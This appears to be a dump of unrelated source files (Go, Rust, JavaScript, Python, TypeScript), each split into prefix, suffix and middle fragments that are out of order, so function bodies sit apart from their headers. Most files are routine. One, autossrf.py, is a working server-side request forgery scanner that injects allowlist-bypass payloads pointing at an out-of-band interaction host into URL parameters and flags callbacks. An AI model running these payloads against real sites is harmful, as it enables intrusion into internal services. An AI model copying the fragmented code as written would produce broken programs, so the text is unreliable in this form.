close(runChan)
testutil.MustDo(t, "Create entries", g.Wait().ErrorOrNil())
return runs
}
func writeToDB(ctx context.Context, jobChan <-chan *actions.RunManifest, repoID string, db db.Database) error {
for run := range jobChan {
_, err := db.Exec(ctx, `INSERT INTO actions_runs(repository_id, run_id, event_type, start_time, end_time, branch_id, source_ref, commit_id, passed)
VALUES ($1,$2,$3,$4,$5,$6,$7,$8,$9)`,
repoID, run.Run.RunID, run.Run.EventType, run.Run.StartTime, run.Run.EndTime, run.Run.BranchID, run.Run.SourceRef, run.Run.CommitID, run.Run.Passed)
if err != nil {
return err
}
for _, h := range run.HooksRun {
_, err = db.Exec(ctx, `INSERT INTO actions_run_hooks(repository_id, run_id, hook_run_id, action_name, hook_id, start_time, end_time, passed)
VALUES ($1,$2,$3,$4,$5,$6,$7,$8)`,
repoID, h.RunID, h.HookRunID, h.ActionName, h.HookID, h.StartTime, h.EndTime, h.Passed)
if err != nil {
return err
}
}
}
return nil
}
| createMigrateTestData |
scan.rs | use super::helpers::is_ident_start;
use super::{Lexer, Token, TokenType};
use calypso_ast::expr::Radix;
use calypso_base::streams::Stream;
use calypso_diagnostic::diagnostic::{EnsembleBuilder, LabelStyle};
use calypso_diagnostic::prelude::*;
impl<'lex> Lexer<'lex> {
/// Scan a single token.
///
/// # Errors
/// The errors returned by this function are of type [`CalError`].
/// When the error is of type [`DiagnosticError::Diagnostic`], it's
/// an error that was impossible to recover from.
///
/// # Panics
///
/// This function should not panic.
#[allow(clippy::too_many_lines)]
pub fn scan(&mut self) -> CalResult<Token<'lex>> |
}
| {
if let Some(wstok) = self.handle_whitespace()? {
return Ok(wstok);
}
self.current_to_start();
if self.is_at_end() {
return Ok(self.new_token(TokenType::Eof));
}
// We've already checked if we're at the end (which is when it gives none), so
// unwrapping should be safe here.
let span = self.next().unwrap();
let ch = span.value_owned();
// Is valid character for identifier's first character
if is_ident_start(&span) {
return Ok(self.handle_identifier());
} else if ch == '\'' {
return self.handle_char_literal();
} else if ch == '"' {
return self.handle_string_literal();
}
if ch == '0' {
if self.is_at_end() {
return Ok(self.new_token(TokenType::Int {
suffix: None,
radix: Radix::None,
}));
}
return Ok(self.handle_int_leading_zero());
} else if ch.is_ascii_digit() {
return Ok(self.handle_number());
}
let token_type = match ch {
'<' if self.next_if_eq(&'<').is_some() => {
if self.next_if_eq(&'=').is_some() {
unimplemented!() // TokenType::LtLtEq
} else {
TokenType::LtLt
}
}
'<' if self.next_if_eq(&'=').is_some() => TokenType::LtEq,
'<' => TokenType::Lt,
'>' if self.next_if_eq(&'>').is_some() => {
if self.next_if_eq(&'=').is_some() {
unimplemented!() // TokenType::GtGtEq
} else {
TokenType::GtGt
}
}
'>' if self.next_if_eq(&'=').is_some() => TokenType::GtEq,
'>' => TokenType::Gt,
'=' if self.next_if_eq(&'=').is_some() => TokenType::EqEq,
// '=' => TokenType::Eq,
'!' if self.next_if_eq(&'=').is_some() => TokenType::BangEq,
'!' => TokenType::Bang,
// '|' if self.next_if_eq(&'>').is_some() => TokenType::PipeGt,
'|' if self.next_if_eq(&'|').is_some() => TokenType::PipePipe,
// '|' if self.next_if_eq(&'=').is_some() => TokenType::PipeEq,
'|' => TokenType::Pipe,
'&' if self.next_if_eq(&'&').is_some() => TokenType::AndAnd,
// '&' if self.next_if_eq(&'=').is_some() => TokenType::AndEq,
'&' => TokenType::And,
// '+' if self.next_if_eq(&'=').is_some() => TokenType::PlusEq,
'+' => TokenType::Plus,
// '-' if self.next_if_eq(&'=').is_some() => TokenType::MinusEq,
// '-' if self.next_if_eq(&'>').is_some() => TokenType::Arrow,
'-' => TokenType::Minus,
'*' if self.next_if_eq(&'*').is_some() => {
if self.next_if_eq(&'=').is_some() {
unimplemented!() // TokenType::StarStarEq
} else {
TokenType::StarStar
}
}
// '*' if self.next_if_eq(&'=').is_some() => TokenType::StarEq,
'*' => TokenType::Star,
// '/' if self.next_if_eq(&'=').is_some() => TokenType::SlashEq,
'/' => TokenType::Slash,
// '%' if self.next_if_eq(&'=').is_some() => TokenType::PercentEq,
'%' => TokenType::Percent,
// '^' if self.next_if_eq(&'=').is_some() => TokenType::CaretEq,
'^' => TokenType::Caret,
'(' => TokenType::LParen,
')' => TokenType::RParen,
// '{' => TokenType::LBrace,
// '}' => TokenType::RBrace,
// '[' => TokenType::LBracket,
// ']' => TokenType::RBracket,
// ',' => TokenType::Comma,
// ';' => TokenType::Semi,
':' => TokenType::Colon,
// '.' if self.next_if_eq(&'.').is_some() => {
// if self.next_if_eq(&'=').is_some() {
// TokenType::DotDotEq
// } else {
// TokenType::DotDot
// }
// }
// '.' => TokenType::Dot,
// // `'_' => Under` is already taken care of by idents
// '#' if self.next_if_eq(&'!').is_some() => TokenType::HashBang,
// '#' => TokenType::Hash,
// Unexpected character
_ => {
self.gcx.grcx.write().report_syncd(
EnsembleBuilder::new()
.error(|b| {
b.code("E0003").short(err!(E0003)).label(
LabelStyle::Primary,
Some("didn't expect this character here"),
self.file_id,
self.new_span(),
)
})
.build(),
);
TokenType::Unexpected
}
};
Ok(self.new_token(token_type))
} |
webpack.config.js | module.exports = {
devtool:"eval-source-map",
| path: __dirname+"/js src",
filename: '[name].bundle.js',
//publicPath:"/....." 如果设置了,那么index.html里边引用的js就需要到这个文件夹下引用,如果没设,那么引用直接和index.html同一个文件夹
},
devServer:{
contentBase:__dirname,
inline:true
},
module: {
rules: [
{
test: /(\.jsx|\.js)$/,
use: {
loader: "babel-loader",
options: {
presets: [
"@babel/env", "@babel/react"
],
plugins:["@babel/plugin-proposal-class-properties"]
}
},
exclude: /node_modules/
},
{
test: /\.css$/,
use: [
{
loader: "style-loader"
}, {
loader: "css-loader",
options:{
modules:true,
localIdentName:"[name]__[local]--[hash:base64:5]"
}
}
]
}
]
}
} | entry: {
DateTimeSelector:'./js src/DateTimeSelector.js',
},
output: { |
autossrf.py | import regex
import argparse
import requests
import time
import os
import threading
import random
execPath = os.getcwd()
currentPath = os.path.dirname(__file__)
os.chdir(currentPath)
FUZZ_PLACE_HOLDER = '??????'
TIMEOUT_DELAY = 5
LOCK = threading.Lock()
parser = argparse.ArgumentParser()
parser.add_argument("--file", "-f", type=str, required=False, help= 'file of all URLs to be tested against SSRF')
parser.add_argument("--url", "-u", type=str, required=False, help= 'url to be tested against SSRF')
parser.add_argument("--threads", "-n", type=int, required=False, help= 'number of threads for the tool')
parser.add_argument("--output", "-o", type=str, required=False, help='output file path')
parser.add_argument("--oneshot", "-t", action='store_true', help='fuzz with only one basic payload - to be activated in case of time constraints')
parser.add_argument("--verbose", "-v", action='store_true', help='activate verbose mode')
args = parser.parse_args() |
if not (args.file or args.url):
parser.error('No input selected: Please add --file or --url as arguments.')
if not os.path.isdir('output'):
os.system("mkdir output")
if not os.path.isdir('output/threadsLogs'):
os.system("mkdir output/threadsLogs")
else:
os.system("rm -r output/threadsLogs")
os.system("mkdir output/threadsLogs")
if args.output:
outputFile = open(f"{execPath}/{args.output}", "a")
else:
outputFile = open("output/ssrf-result.txt", "a")
if args.file:
allURLs = [line.replace('\n', '') for line in open(f"{execPath}/{args.file}", "r")]
regexParams = regex.compile('(?<=(access|dbg|debug|edit|grant|clone|exec|execute|load|make|modify|reset|shell|toggle|adm|root|cfg|dest|redirect|uri|path|continue|url|window|next|data|site|html|validate|domain|callback|return|host|port|to|out|view|dir|show|navigation|open|file|document|folder|pg|php_path|doc|img|filename|file_name|image)=)(.*)(?=(&|$))', flags=regex.IGNORECASE)
extractInteractionServerURL = "(?<=] )([a-z0-9][a-z0-9][a-z0-9].*)"
def getFileSize(fileID):
interactionLogs = open(f"output/threadsLogs/interaction-logs{fileID}.txt", "r")
return len(interactionLogs.read())
def getInteractionServer():
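    # Start an interactsh-client in the background and poll its log file until
    # the out-of-band interaction server URL appears, then return it along with the log file ID.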
id = random.randint(0, 999999)
os.system(f"interactsh-client -pi 1 &> output/threadsLogs/interaction-logs{id}.txt &")
time.sleep(2)
interactionServer = None
while not interactionServer:
interactionLogs = open(f"output/threadsLogs/interaction-logs{id}.txt", "r")
fileContent = interactionLogs.read()
pastInteractionLogsSize = len(fileContent)
interactionServer = regex.search(extractInteractionServerURL, fileContent)
time.sleep(2)
interactionServer = interactionServer.group()
return interactionServer, id
def exception_verbose_message(exceptionType):
if args.verbose:
if exceptionType == "timeout":
print("\nTimeout detected... URL skipped")
elif exceptionType == "redirects":
print("\nToo many redirects... URL skipped")
elif exceptionType == "others":
print("\nRequest error... URL skipped")
def splitURLS(threadsSize): #Multithreading
splitted = []
URLSsize = len(allURLs)
width = int(URLSsize/threadsSize)
if width == 0:
width = 1
endVal = 0
i = 0
while endVal != URLSsize:
if URLSsize <= i + 2 * width:
if len(splitted) == threadsSize - 2:
endVal = int(i + (URLSsize - i)/2)
else:
endVal = URLSsize
else:
endVal = i + width
splitted.append(allURLs[i: endVal])
i += width
return splitted
def generatePayloads(whitelistedHost, interactionHost):
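    # Allowlist-bypass SSRF payloads that combine the whitelisted host with the
    # out-of-band interaction host.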
generated =[
f"http://{interactionHost}",
f"//{interactionHost}",
f"http://{whitelistedHost}.{interactionHost}", # whitelisted.attacker.com
f"http://{interactionHost}?{whitelistedHost}",
f"http://{interactionHost}/{whitelistedHost}",
f"http://{interactionHost}%ff@{whitelistedHost}",
f"http://{interactionHost}%ff.{whitelistedHost}",
f"http://{whitelistedHost}%25253F@{interactionHost}",
f"http://{whitelistedHost}%253F@{interactionHost}",
f"http://{whitelistedHost}%3F@{interactionHost}",
f"http://{whitelistedHost}@{interactionHost}",
f"http://foo@{interactionHost}:80@{whitelistedHost}",
f"http://foo@{interactionHost}%20@{whitelistedHost}",
f"http://foo@{interactionHost}%09@{whitelistedHost}"
]
return generated
def smart_extract_host(url, matchedElement):
urlDecodedElem = requests.utils.unquote(matchedElement)
hostExtractorRegex = '(?<=(https|http):\/\/)(.*?)(?=\/)'
extractedHost = regex.search(hostExtractorRegex, urlDecodedElem)
if not extractedHost:
extractedHost = regex.search(hostExtractorRegex, url)
return extractedHost.group()
def prepare_url_with_regex(url):
replacedURL = regexParams.sub(FUZZ_PLACE_HOLDER, url)
matchedElem = regexParams.search(url)
if matchedElem:
matchedElem = matchedElem.group()
return replacedURL, matchedElem
def fuzz_SSRF(url, interactionServer, fileID):
pastInteractionLogsSize = getFileSize(fileID)
replacedURL, matchedElem = prepare_url_with_regex(url)
if not matchedElem: #No relevant parameter matching
return
if args.oneshot:
payloadsList = [f"http://{interactionServer}"]
else:
host = smart_extract_host(url, matchedElem)
payloadsList = generatePayloads(host, interactionServer)
if args.verbose:
if not args.threads:
print(f" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +")
print(f"\nStarting fuzzing {replacedURL}")
for payload in payloadsList:
fuzz_and_detect_with_payload("FUZZ", replacedURL, payload, fileID)
time.sleep(2)
if isInteractionDetected(pastInteractionLogsSize, fileID):
if args.verbose:
print(f"\nSSRF identified in {replacedURL}. Determining valid payload ...")
for payload in payloadsList:
if fuzz_and_detect_with_payload("DETECT", replacedURL, payload, fileID):
print(f"SSRF detected in {replacedURL} with payload {payload}.")
with LOCK:
outputFile.write(f"SSRF detected in {replacedURL} with payload {payload}\n")
return
else:
if args.verbose:
print(f"\nNothing detected for {replacedURL}")
def fuzz_and_detect_with_payload(type ,url, payload, fileID):
pastInteractionLogsSize = getFileSize(fileID)
fuzzedUrl = url.replace(FUZZ_PLACE_HOLDER, payload)
if args.verbose:
if not args.threads:
print(f"Testing payload: {payload} ", end="\r")
requests.get(fuzzedUrl, timeout=TIMEOUT_DELAY)
if type == "DETECT":
time.sleep(2)
return isInteractionDetected(pastInteractionLogsSize, fileID)
def isInteractionDetected(pastInteractionLogsSize, fileID):
currentInteractionLogsSize = getFileSize(fileID)
if currentInteractionLogsSize != pastInteractionLogsSize:
return True
return False
def sequential_url_scan(urlList):
interactionServer, fileID = getInteractionServer()
for url in urlList:
try:
fuzz_SSRF(url, interactionServer, fileID)
except requests.exceptions.Timeout:
exception_verbose_message("timeout")
except requests.exceptions.TooManyRedirects:
exception_verbose_message("redirects")
except Exception as e: #requests.exceptions.RequestException:
print(f"{url} : {e}")
exception_verbose_message("others")
def main():
if args.url:
try:
sequential_url_scan([args.url])
except Exception as e:
print("\nInvalid URL")
elif args.file:
if not args.threads or args.threads == 1:
sequential_url_scan(allURLs)
else:
workingThreads = []
split = splitURLS(args.threads)
for subList in split:
t = threading.Thread(target=sequential_url_scan, args=[subList])
t.start()
workingThreads.append(t)
for thread in workingThreads:
thread.join()
outputFile.close()
if __name__ == '__main__':
main() | |
questions-reducer.js | import autodux from 'autodux';
import cuid from 'cuid';
import { Scoring } from '../../../config/config';
export const {
reducer,
slice,
actions: {
addQuestion,
removeQuestion,
updateQuestion,
setQuestions,
},
selectors: {
getQuestions,
getScore,
isLoaded,
} | } = autodux({
slice: 'questions',
initial: {
loaded: false,
questions: [],
},
actions: {
addQuestion: {
create: payload => ({
id: cuid(),
timestamp: Date.now(),
...payload,
}),
reducer: (state, payload) => ({
...state,
questions: state.questions.concat([payload]),
})
},
removeQuestion: (state, payload) => ({
...state,
questions: state.questions.filter(question => question.id !== payload),
}),
updateQuestion: (state, payload) => ({
...state,
questions: state.questions.map(question => question.id === payload.id
? { ...question, ...payload.fields }
: question),
}),
setQuestions: (state, payload) => ({
...state,
loaded: true,
questions: payload,
}),
},
selectors: {
getScore: state => state.questions.reduce((score, question) =>
score + Scoring[question.status]
, 0),
isLoaded: state => state.loaded,
}
}); | |
tests_admin.py | from django.test import TestCase
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import Client
from organization.models import Organization
class AdminSiteTests(TestCase):
def setUp(self):
admin_email = '[email protected]'
admin_pass = 'password123'
self.client = Client()
self.organization = Organization.objects.create(name="PNSN")
self.admin_user = get_user_model().objects.create_superuser(
email=admin_email,
password=admin_pass,
organization=self.organization,
)
self.client.force_login(self.admin_user)
self.user = get_user_model().objects.create_user(
email='[email protected]',
password='password123',
firstname='your',
lastname='mom',
organization=self.organization
)
def test_users_listed(self):
|
def test_user_change_page(self):
        '''Test that the user edit page works'''
url = reverse('admin:core_user_change', args=[self.user.id])
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
def test_create_user_page(self):
'''test that create user page works'''
url = reverse('admin:core_user_add')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
| """Test that users are listed on the user page"""
url = reverse('admin:core_user_changelist')
res = self.client.get(url)
self.assertContains(res, self.user.firstname)
self.assertContains(res, self.user.email) |
stager.go | package libbuildpack
import (
"errors"
"fmt"
"io/ioutil"
"os"
"path/filepath"
"strings"
)
type Stager struct {
buildDir string
cacheDir string
depsDir string
depsIdx string
manifest *Manifest
log *Logger
}
func NewStager(args []string, logger *Logger, manifest *Manifest) *Stager |
func (s *Stager) DepDir() string {
return filepath.Join(s.depsDir, s.depsIdx)
}
func (s *Stager) WriteConfigYml(config interface{}) error {
if config == nil {
config = map[interface{}]interface{}{}
}
data := map[string]interface{}{"name": s.manifest.Language(), "config": config}
y := &YAML{}
return y.Write(filepath.Join(s.DepDir(), "config.yml"), data)
}
func (s *Stager) WriteEnvFile(envVar, envVal string) error {
envDir := filepath.Join(s.DepDir(), "env")
if err := os.MkdirAll(envDir, 0755); err != nil {
return err
}
return ioutil.WriteFile(filepath.Join(envDir, envVar), []byte(envVal), 0644)
}
func (s *Stager) AddBinDependencyLink(destPath, sourceName string) error {
binDir := filepath.Join(s.DepDir(), "bin")
if err := os.MkdirAll(binDir, 0755); err != nil {
return err
}
relPath, err := filepath.Rel(binDir, destPath)
if err != nil {
return err
}
return os.Symlink(relPath, filepath.Join(binDir, sourceName))
}
func (s *Stager) LinkDirectoryInDepDir(destDir, depSubDir string) error {
srcDir := filepath.Join(s.DepDir(), depSubDir)
if err := os.MkdirAll(srcDir, 0755); err != nil {
return err
}
files, err := ioutil.ReadDir(destDir)
if err != nil {
return err
}
for _, file := range files {
relPath, err := filepath.Rel(srcDir, filepath.Join(destDir, file.Name()))
if err != nil {
return err
}
if err := os.Symlink(relPath, filepath.Join(srcDir, file.Name())); err != nil {
return err
}
}
return nil
}
func (s *Stager) CheckBuildpackValid() error {
version, err := s.manifest.Version()
if err != nil {
s.log.Error("Could not determine buildpack version: %s", err.Error())
return err
}
s.log.BeginStep("%s Buildpack version %s", strings.Title(s.manifest.Language()), version)
err = s.manifest.CheckStackSupport()
if err != nil {
s.log.Error("Stack not supported by buildpack: %s", err.Error())
return err
}
s.manifest.CheckBuildpackVersion(s.cacheDir)
return nil
}
func (s *Stager) StagingComplete() {
s.manifest.StoreBuildpackMetadata(s.cacheDir)
}
func (s *Stager) ClearCache() error {
files, err := ioutil.ReadDir(s.cacheDir)
if err != nil {
if os.IsNotExist(err) {
return nil
}
return err
}
for _, file := range files {
err = os.RemoveAll(filepath.Join(s.cacheDir, file.Name()))
if err != nil {
return err
}
}
return nil
}
func (s *Stager) ClearDepDir() error {
files, err := ioutil.ReadDir(s.DepDir())
if err != nil {
return err
}
for _, file := range files {
if file.Name() != "config.yml" {
if err := os.RemoveAll(filepath.Join(s.DepDir(), file.Name())); err != nil {
return err
}
}
}
return nil
}
func (s *Stager) WriteProfileD(scriptName, scriptContents string) error {
profileDir := filepath.Join(s.DepDir(), "profile.d")
err := os.MkdirAll(profileDir, 0755)
if err != nil {
return err
}
return writeToFile(strings.NewReader(scriptContents), filepath.Join(profileDir, scriptName), 0755)
}
func (s *Stager) BuildDir() string {
return s.buildDir
}
func (s *Stager) CacheDir() string {
return s.cacheDir
}
func (s *Stager) DepsIdx() string {
return s.depsIdx
}
var stagingEnvVarDirs = map[string]string{
"PATH": "bin",
"LD_LIBRARY_PATH": "lib",
"INCLUDE_PATH": "include",
"CPATH": "include",
"CPPPATH": "include",
"PKG_CONFIG_PATH": "pkgconfig",
}
var launchEnvVarDirs = map[string]string{
"PATH": "bin",
"LD_LIBRARY_PATH": "lib",
}
func (s *Stager) SetStagingEnvironment() error {
for envVar, dir := range stagingEnvVarDirs {
oldVal := os.Getenv(envVar)
depsPaths, err := existingDepsDirs(s.depsDir, dir, s.depsDir)
if err != nil {
return err
}
if len(depsPaths) != 0 {
if len(oldVal) > 0 {
depsPaths = append(depsPaths, oldVal)
}
os.Setenv(envVar, strings.Join(depsPaths, ":"))
}
}
depsPaths, err := existingDepsDirs(s.depsDir, "env", s.depsDir)
if err != nil {
return err
}
for _, dir := range depsPaths {
files, err := ioutil.ReadDir(dir)
if err != nil {
return err
}
for _, file := range files {
if file.Mode().IsRegular() {
val, err := ioutil.ReadFile(filepath.Join(dir, file.Name()))
if err != nil {
return err
}
if err := os.Setenv(file.Name(), string(val)); err != nil {
return err
}
}
}
}
return nil
}
func (s *Stager) SetLaunchEnvironment() error {
scriptContents := ""
for envVar, dir := range launchEnvVarDirs {
depsPaths, err := existingDepsDirs(s.depsDir, dir, "$DEPS_DIR")
if err != nil {
return err
}
if len(depsPaths) != 0 {
scriptContents += fmt.Sprintf(`export %[1]s=%[2]s$([[ ! -z "${%[1]s:-}" ]] && echo ":$%[1]s")`, envVar, strings.Join(depsPaths, ":"))
scriptContents += "\n"
}
}
if err := os.MkdirAll(filepath.Join(s.buildDir, ".profile.d"), 0755); err != nil {
return err
}
scriptLocation := filepath.Join(s.buildDir, ".profile.d", "000_multi-supply.sh")
if err := writeToFile(strings.NewReader(scriptContents), scriptLocation, 0755); err != nil {
return err
}
profileDirs, err := existingDepsDirs(s.depsDir, "profile.d", s.depsDir)
if err != nil {
return err
}
for _, dir := range profileDirs {
sections := strings.Split(dir, string(filepath.Separator))
if len(sections) < 2 {
return errors.New("invalid dep dir")
}
depsIdx := sections[len(sections)-2]
files, err := ioutil.ReadDir(dir)
if err != nil {
return err
}
for _, file := range files {
if file.Mode().IsRegular() {
src := filepath.Join(dir, file.Name())
dest := filepath.Join(s.buildDir, ".profile.d", depsIdx+"_"+file.Name())
if err := CopyFile(src, dest); err != nil {
return err
}
}
}
}
return nil
}
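// existingDepsDirs returns, for each dependency index under depsDir, the
// subDir directory that exists on disk, each joined onto prefix.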
func existingDepsDirs(depsDir, subDir, prefix string) ([]string, error) {
files, err := ioutil.ReadDir(depsDir)
if err != nil {
return nil, err
}
var existingDirs []string
for _, file := range files {
if !file.IsDir() {
continue
}
filesystemDir := filepath.Join(depsDir, file.Name(), subDir)
dirToJoin := filepath.Join(prefix, file.Name(), subDir)
addToDirs, err := FileExists(filesystemDir)
if err != nil {
return nil, err
}
if addToDirs {
existingDirs = append([]string{dirToJoin}, existingDirs...)
}
}
return existingDirs, nil
}
| {
buildDir := args[0]
cacheDir := args[1]
depsDir := ""
depsIdx := ""
if len(args) >= 4 {
depsDir = args[2]
depsIdx = args[3]
}
s := &Stager{buildDir: buildDir,
cacheDir: cacheDir,
depsDir: depsDir,
depsIdx: depsIdx,
manifest: manifest,
log: logger,
}
return s
} |
mod.rs | pub mod install;
pub mod remove; |
||
elm.js | 'use strict';(function(d){"object"==typeof exports&&"object"==typeof module?d(require("../../lib/codemirror")):"function"==typeof define&&define.amd?define(["../../lib/codemirror"],d):d(CodeMirror)})(function(d){d.defineMode("elm",function(){function | (a,c,b){c(b);return b(a,c)}function f(){return function(a,c){if(a.eatWhile(h))return null;var b=a.next();if(p.test(b))return"{"==b&&a.eat("-")?(b="comment",a.eat("#")&&(b="meta"),d(a,c,k(b,1))):null;if("'"==b)return a.eat("\\"),a.next(),a.eat("'")?"string":
"error";if('"'==b)return d(a,c,l);if(q.test(b))return a.eatWhile(m),a.eat(".")?"qualifier":"variable-2";if(r.test(b))return c=1===a.pos,a.eatWhile(m),c?"type":"variable";if(e.test(b)){if("0"==b){if(a.eat(/[xX]/))return a.eatWhile(t),"integer";if(a.eat(/[oO]/))return a.eatWhile(u),"number"}a.eatWhile(e);b="number";a.eat(".")&&(b="number",a.eatWhile(e));a.eat(/[eE]/)&&(b="number",a.eat(/[-+]/),a.eatWhile(e));return b}if(g.test(b)){if("-"==b&&a.eat(/-/)&&(a.eatWhile(/-/),!a.eat(g)))return a.skipToEnd(),
"comment";a.eatWhile(g);return"builtin"}return"error"}}function k(a,c){return 0==c?f():function(b,d){for(var e=c;!b.eol();){var g=b.next();if("{"==g&&b.eat("-"))++e;else if("-"==g&&b.eat("}")&&(--e,0==e))return d(f()),a}d(k(a,e));return a}}function l(a,c){for(;!a.eol();){var b=a.next();if('"'==b)return c(f()),"string";if("\\"==b){if(a.eol()||a.eat(h))return c(v),"string";a.eat("&")||a.next()}}c(f());return"error"}function v(a,c){if(a.eat("\\"))return d(a,c,l);a.next();c(f());return"error"}var r=/[a-z_]/,
q=/[A-Z]/,e=/[0-9]/,t=/[0-9A-Fa-f]/,u=/[0-7]/,m=/[a-z_A-Z0-9']/,g=/[-!#$%&*+.\/<=>?@\\^|~:\u03BB\u2192]/,p=/[(),;[\]`{}]/,h=/[ \t\v\f]/,n=function(){for(var a={},c='case of as if then else let in infix infixl infixr type alias input output foreign loopback module where import exposing _ .. | : = \\ " -> <-'.split(" "),b=c.length;b--;)a[c[b]]="keyword";return a}();return{startState:function(){return{f:f()}},copyState:function(a){return{f:a.f}},token:function(a,c){var b=c.f(a,function(a){c.f=a});a=
a.current();return n.hasOwnProperty(a)?n[a]:b}}});d.defineMIME("text/x-elm","elm")});
| d |
api.test.ts | import test from "tape";
import browser from "webextension-polyfill";
import { isBackground, isContentScript, isWebPage } from "webext-detect-page";
import { PageTarget, Sender, Target } from "../..";
import * as backgroundContext from "../background/api";
import * as localContext from "../background/testingApi";
import {
getPageTitle,
setPageTitle,
closeSelf,
sumIfMeta,
contentScriptOnly,
throws,
notRegistered,
getTrace,
notRegisteredNotification,
getPageTitleNotification,
} from "./api";
function senderIsCurrentPage(
t: test.Test,
sender: Sender | undefined,
message: string
) {
t.equal(sender?.url, location.href, message);
}
function senderisBackground(
t: test.Test,
sender: Sender | undefined,
message: string
) {
t.true(
// TODO: `as any` because `self` is typed for Firefox only
(sender as any).origin === "null" || // Chrome
sender!.url?.endsWith("/_generated_background_page.html"), // Firefox
message
);
}
const { openTab, createTargets, ensureScripts, closeTab } = isBackground()
? localContext
: backgroundContext;
async function delay(timeout: number): Promise<void> {
await new Promise((resolve) => {
setTimeout(resolve, timeout);
});
}
function | (target: Target | PageTarget, expectedTitle: string) {
test(expectedTitle + ": send message and get response", async (t) => {
const title = await getPageTitle(target);
t.equal(title, expectedTitle);
});
test(expectedTitle + ": support parameters", async (t) => {
await setPageTitle(target, "New Title");
const title = await getPageTitle(target);
t.equal(title, "New Title");
});
test(
expectedTitle + ": should receive information from the caller",
async (t) => {
t.equal(await sumIfMeta(target, 1, 2, 3, 4), 10);
}
);
if (!("page" in target)) {
test(
expectedTitle + ": handler must be executed in the content script",
async (t) => {
t.equal(await contentScriptOnly(target), true);
}
);
}
test(
expectedTitle + ": should receive error from a background handler",
async (t) => {
try {
await throws(target);
t.fail("throws() should have thrown but did not");
} catch (error: unknown) {
if (!(error instanceof Error)) {
t.fail("The error is not an instance of Error");
return;
}
if (!error.stack) {
t.fail("The error has no stack");
return;
}
t.equal(error.message, "This my error");
t.true(
error.stack.includes("/contentscript/registration.js"),
"The stacktrace must come from the content script"
);
t.true(
// Chrome format || Firefox format
error.stack.includes("at Object.throws") ||
error.stack.includes("throws@moz-"),
"The stacktrace must include the original name of the method"
);
}
}
);
test(
expectedTitle +
": should receive error from the content script if it’s not registered",
async (t) => {
try {
await notRegistered(target);
t.fail("notRegistered() should have thrown but did not");
} catch (error: unknown) {
if (!(error instanceof Error)) {
t.fail("The error is not an instance of Error");
return;
}
t.equal(
error.message,
`No handler registered for notRegistered in ${
"page" in target ? "extension" : "contentScript"
}`
);
}
}
);
test(expectedTitle + ": should receive trace", async (t) => {
const trace = await getTrace(target);
t.true(Array.isArray(trace));
const originalSender = trace[0];
const directSender = trace[trace.length - 1];
if (isContentScript() || !isBackground()) {
senderIsCurrentPage(
t,
originalSender,
"Messages should mention the current page in trace[0]"
);
} else {
senderisBackground(
t,
directSender,
"Messages should mention the current page (background) in trace[0]"
);
}
if (!("page" in target && isContentScript())) {
senderisBackground(
t,
directSender,
"Messages originated in content scripts or background pages must come directly from the background page"
);
}
if (!isWebPage()) {
t.equal(
trace.length,
1,
"Messages originated in extension pages don’t need to be forwarded"
);
}
});
test(expectedTitle + ": notification should return undefined", async (t) => {
// eslint-disable-next-line @typescript-eslint/no-confusing-void-expression -- Testing for this specifically
t.equals(getPageTitleNotification(target), undefined);
});
test(
expectedTitle +
": notification without registered handlers should not throw",
async (t) => {
notRegisteredNotification(target);
t.pass();
}
);
}
async function init() {
const { tabId, parentFrame, iframe } = await createTargets();
// All `test` calls must be done synchronously, or else the runner assumes they're done
runOnTarget({ tabId, frameId: parentFrame }, "Parent");
runOnTarget({ tabId, frameId: iframe }, "Child");
runOnTarget({ tabId, page: "/iframe.html" }, "Extension frame");
test("should throw the right error when `registerMethod` was never called", async (t) => {
const tabId = await openTab(
"https://fregante.github.io/pixiebrix-testing-ground/Unrelated-CS-on-this-page"
);
try {
await getPageTitle({ tabId });
t.fail("getPageTitle() should have thrown but did not");
} catch (error: unknown) {
if (!(error instanceof Error)) {
t.fail("The error is not an instance of Error");
return;
}
t.equal(
error.message,
"No handler registered for getPageTitle in the receiving end"
);
await closeTab(tabId);
}
});
test("should be able to close the tab from the content script", async (t) => {
await closeSelf({ tabId, frameId: parentFrame });
try {
// Since the tab was closed, this is expected to throw
t.notOk(await browser.tabs.get(tabId), "The tab should not be open");
} catch {
t.pass("The tab was closed");
}
});
test("retries until target is ready", async (t) => {
const tabId = await openTab(
"https://fregante.github.io/pixiebrix-testing-ground/No-static-content-scripts"
);
const request = getPageTitle({ tabId });
await delay(1000); // Simulate a slow-loading tab
await ensureScripts(tabId);
t.equal(await request, "No static content scripts");
await closeTab(tabId);
});
test("retries until it times out", async (t) => {
const tabId = await openTab(
"https://fregante.github.io/pixiebrix-testing-ground/No-static-content-scripts"
);
const startTime = Date.now();
try {
await getPageTitle({ tabId });
t.fail("getPageTitle() should have thrown but did not");
} catch (error: unknown) {
if (!(error instanceof Error)) {
t.fail("The error is not an instance of Error");
return;
}
t.equal(
error.message,
"Could not establish connection. Receiving end does not exist."
);
const duration = Date.now() - startTime;
t.ok(
duration > 4000 && duration < 5000,
`It should take between 4 and 5 seconds (took ${duration / 1000}s)`
);
}
await closeTab(tabId);
});
test("notifications on non-existing targets", async (t) => {
try {
getPageTitleNotification({ tabId: 9001 });
} catch (error: unknown) {
t.fail("Should not throw");
throw error;
}
t.pass();
});
test("notifications when `registerMethod` was never called", async () => {
const tabId = await openTab(
"https://fregante.github.io/pixiebrix-testing-ground/No-static-content-scripts"
);
getPageTitleNotification({ tabId });
await closeTab(tabId);
});
}
void init();
| runOnTarget |
views.py | from django.shortcuts import render, redirect
from .credentials import REDIRECT_URI, CLIENT_SECRET, CLIENT_ID
from rest_framework.views import APIView
from requests import Request, post
from rest_framework import status
from rest_framework.response import Response
from .util import *
from api.models import Room
from .models import Vote
class AuthURL(APIView):
    def get(self, request, format=None):
scopes = 'user-read-playback-state user-modify-playback-state user-read-currently-playing'
url = Request('GET', 'https://accounts.spotify.com/authorize', params={
'scope': scopes,
'response_type': 'code',
'redirect_uri': REDIRECT_URI,
'client_id': CLIENT_ID
}).prepare().url
return Response({'url': url}, status=status.HTTP_200_OK)
def spotify_callback(request, format=None):
code = request.GET.get('code')
error = request.GET.get('error')
response = post('https://accounts.spotify.com/api/token', data={
'grant_type': 'authorization_code',
'code': code,
'redirect_uri': REDIRECT_URI,
'client_id': CLIENT_ID,
'client_secret': CLIENT_SECRET
}).json()
access_token = response.get('access_token')
token_type = response.get('token_type')
refresh_token = response.get('refresh_token')
expires_in = response.get('expires_in')
error = response.get('error')
